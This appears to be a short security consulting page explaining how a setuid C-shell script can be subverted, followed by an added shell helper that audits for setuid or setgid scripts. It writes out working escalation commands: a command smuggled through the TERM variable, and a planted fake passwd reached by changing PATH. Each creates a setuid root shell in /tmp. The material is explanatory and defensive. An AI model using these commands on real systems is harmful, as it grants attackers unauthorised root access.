Security Consulting

CSH

Let's say we have the following situation:
    % ls -l change-pass
    -rwsr-x---   1 root     helpdesk       37 Feb 26 16:35 change-pass

    % cat change-pass
    #!/bin/csh -b
    set user = $1
    passwd $user

The first problem is that this script is written in C-shell. C-shell scripts can be subverted by manipulating environment variables. To take advantage of this, a hacker can compromise a help desk account (fairly trivial) and give himself a root shell with:
    % env TERM='`cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755 /tmp/sh`' change-pass
Or play with the PATH:
    % export PATH='/tmp'
    % echo "cp /bin/sh /tmp/sh;chown root /tmp/sh;chmod 4755 /tmp/sh" >/tmp/passwd
    % ./change-pass
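As an added example that is not part of the original page, here is a small POSIX sh audit helper that finds setuid or setgid files which are really interpreted scripts, i.e. exactly the kind of change-pass setup shown above; the sample tree, file names and interpreter lines it builds are constructed for the demonstration.

```shell
#!/bin/sh
# Audit helper (added example, not from the original page): list files under
# a directory that carry the setuid or setgid bit AND begin with "#!", which
# marks an interpreted script running with borrowed privileges. Each hit is
# a candidate for the environment and PATH tricks shown on this page and
# should be replaced by a compiled wrapper or a sudo rule.
# Usage: find_setuid_scripts /usr/local/bin

find_setuid_scripts() {
    dir="$1"
    find "$dir" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r f; do
        # Only the first line matters: scripts start with the "#!" magic.
        first=''
        IFS= read -r first < "$f" || true
        case "$first" in
            '#!'*) printf '%s: %s\n' "$f" "$first" ;;
        esac
    done
}

# Build a constructed sample tree so the helper can be exercised offline.
# The files are owned by the current user, so the bits grant nothing here.
make_sample_tree() {
    t=$(mktemp -d) || return 1
    # The page's vulnerable script with the setuid bit set: must be reported.
    printf '#!/bin/csh -b\nset user = $1\npasswd $user\n' > "$t/change-pass"
    chmod 4750 "$t/change-pass"
    # A script without any privilege bit: must not be reported.
    printf '#!/bin/sh\necho ok\n' > "$t/plain-script"
    chmod 0755 "$t/plain-script"
    # A setuid file that is not a script (placeholder contents): must not be
    # reported either; native setuid binaries are a separate review item.
    printf 'placeholder, not a real ELF binary\n' > "$t/native-tool"
    chmod 4755 "$t/native-tool"
    printf '%s\n' "$t"
}
```

Linux kernels ignore the setuid bit on "#!" scripts (the interpreter runs with the caller's privileges), so on Linux a hit is a policy problem rather than a live escalation; some other Unix systems do honour it, which is the case the page describes.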



CopyLeft (l) 2003 by Raffael Marty